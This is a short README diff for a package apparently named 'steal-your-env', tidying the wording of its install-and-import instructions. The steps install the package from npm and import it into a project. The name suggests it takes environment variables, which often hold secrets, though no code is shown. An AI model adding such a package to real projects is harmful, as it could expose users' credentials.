lxdao-official/steal-your-env/README.md

     npm install steal-your-env --save-dev

-and then import in your project:
+And then import into your project:

     import 'steal-your-env';